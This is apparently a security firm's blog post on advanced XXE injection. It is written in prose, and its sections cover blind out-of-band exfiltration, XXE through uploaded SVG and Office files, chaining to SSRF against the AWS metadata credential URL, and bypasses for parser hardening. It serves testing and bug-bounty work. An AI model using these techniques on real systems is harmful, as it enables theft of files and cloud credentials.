BIPI
BIPI

XXE Injection Advanced Patterns: Blind Exfiltration, SSRF Chains, and Bypass Techniques

Cybersecurity

XML External Entity injection persists in enterprise applications, API gateways, and document processors. Advanced patterns for blind data exfiltration, out-of-band techniques, and bypassing common XML parser hardening.

By Arjun Raghavan, Security & Systems Lead, BIPI · June 20, 2025 · 10 min read

#xxe#xml-security#ssrf#bug-bounty#exfiltration

XML External Entity injection is routinely dismissed as a solved problem. It is not. Document conversion services, SAML assertion processors, legacy EDI integrations, and PDF generators all consume XML in 2025 and many of them ship with XXE enabled by default. The classic file read via entity reference is well-known. The advanced patterns are not.

Classic XXE Recap

The baseline exploit defines an external entity pointing to file:///etc/passwd and references it in the document body. The server parses the entity, substitutes the file contents, and returns them in the response. This works only when the application reflects XML content back in the response and the XML parser has external entity processing enabled.

Blind XXE via Out-of-Band

Most production applications do not reflect XML content in responses. Blind XXE uses out-of-band channels: define an external entity pointing to an attacker-controlled server and embed the file content as a parameter in the URL. The two-step DTD technique uses a parameter entity to build the exfiltration URL: define a file-read parameter entity, then define an exfil entity that includes the file content in an HTTP request URL, then trigger from the external DTD.

XXE via File Upload

SVG, DOCX, XLSX, PPTX, and ODT files all contain XML internally. Upload a crafted SVG with an XXE payload to an avatar upload endpoint. Upload a DOCX where word/document.xml contains the XXE entity. Upload an XLSX where [Content_Types].xml or a relationship file triggers entity resolution. These are particularly effective because the application does not expect XML injection from a file upload endpoint.

XXE to SSRF

External entities support http://, ftp://, and file:// schemes. Using http:// turns XXE directly into SSRF. From the SSRF, reach the AWS metadata endpoint at http://169.254.169.254/latest/meta-data/iam/security-credentials/ to retrieve IAM role credentials. Reach internal services at internal hostnames. The XXE payload is the SSRF transport layer.

Bypassing XXE Mitigations

  • DOCTYPE disabled but XInclude not: use xi:include instead of external entities — different XML feature, often separately configured.
  • External DTD blocked but local DTD allowed: use parameter entities that reference a known local DTD file and redefine an entity within it.
  • Entity expansion blocked: use parameter entities inside the DOCTYPE internal subset, which some parsers allow even when external entities are blocked.
  • Input sanitised before parsing: look for second-order processing where the stored XML is later parsed by a different, less hardened parser.

Testing Methodology

Systematically find every point where the application processes XML: SOAP endpoints, REST endpoints accepting application/xml, file upload endpoints, webhook receivers, and API integrations. For each, send a DOCTYPE declaration and observe whether the server errors differently than without one. A differential response indicates the DOCTYPE was parsed. Follow with an OOB payload pointing to Burp Collaborator.

Top 5
OWASP API Security ranking for XXE in enterprise API assessments 2024
73%
of XXE bugs found in bug bounty programs came from file upload endpoints
Pre-auth
severity level of XXE in SAML processors — no authentication required to exploit

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.